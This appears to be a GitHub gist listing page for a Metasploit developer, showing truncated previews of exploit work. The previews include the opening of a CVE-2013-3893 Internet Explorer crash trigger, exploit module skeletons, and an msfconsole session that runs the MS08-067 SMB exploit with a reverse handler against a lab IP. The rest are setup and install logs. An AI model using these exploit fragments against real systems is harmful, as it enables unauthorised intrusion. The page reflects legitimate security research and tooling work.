Skip to content

Instantly share code, notes, and snippets.

sinn3r wchen-r7

Block or report user

Report or block wchen-r7

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View cve_2013_3893_trigger.html
<html>
<script>
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
View gist:6774619
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
View gist:7047590
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "IE test",
View gist:858b90913ca49019099d
msf > irb
[*] Starting IRB shell...
>> require 'method_source'
=> true
>> framework.db.method(:import_ip_list_file).source_location
=> ["/Users/sinn3r/rapid7/msf/lib/msf/core/db_manager/import/ip_list.rb", 18]
>> framework.db.method(:import_ip_list_file).parameters
=> [[:opt, :args]]
>> puts framework.db.method(:import_ip_list_file).source
View ms08_067_netapi_demo.txt
$ ./msfconsole -q
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.1.80
rhost => 192.168.1.80
msf exploit(ms08_067_netapi) > check
[+] 192.168.1.80:445 - The target is vulnerable.
msf exploit(ms08_067_netapi) > run
[*] Started reverse handler on 192.168.1.64:4444
[*] Automatically detecting the target...
View sounds_template.rb
#
# $Id$
# $Revision$
#
module Msf
###
#
# This class hooks all session creation events and plays a sound
View test.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
View gist:d65dfb5e02f9300fce00
sinn3r $ cd ~/rapid7/msf
sinn3r $ bundle install
Resolving dependencies...
Using rake 10.4.2
Using i18n 0.6.11
Using multi_json 1.0.4
Using activesupport 3.2.21
Using builder 3.0.4
Using activemodel 3.2.21
Using erubis 2.7.0
View gist:078fe52118de84a4ad7b
sinn3r$ rvm use ruby-1.9.3-p448
Using /Users/sinn3r/.rvm/gems/ruby-1.9.3-p448
sinn3r$ ./msfpayload -h
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Could not find rake-10.4.2 in any of the sources
View gist:efcb46224b7a8320186c
sudo apt-get -y install \
build-essential zlib1g zlib1g-dev \
libxml2 libxml2-dev libxslt-dev locate \
libreadline6-dev libcurl4-openssl-dev git-core \
libssl-dev libyaml-dev openssl autoconf libtool \
ncurses-dev bison curl wget postgresql \
postgresql-contrib libpq-dev \
libapr1 libaprutil1 libsvn1 \
libpcap-dev libsqlite3-dev
You can’t perform that action at this time.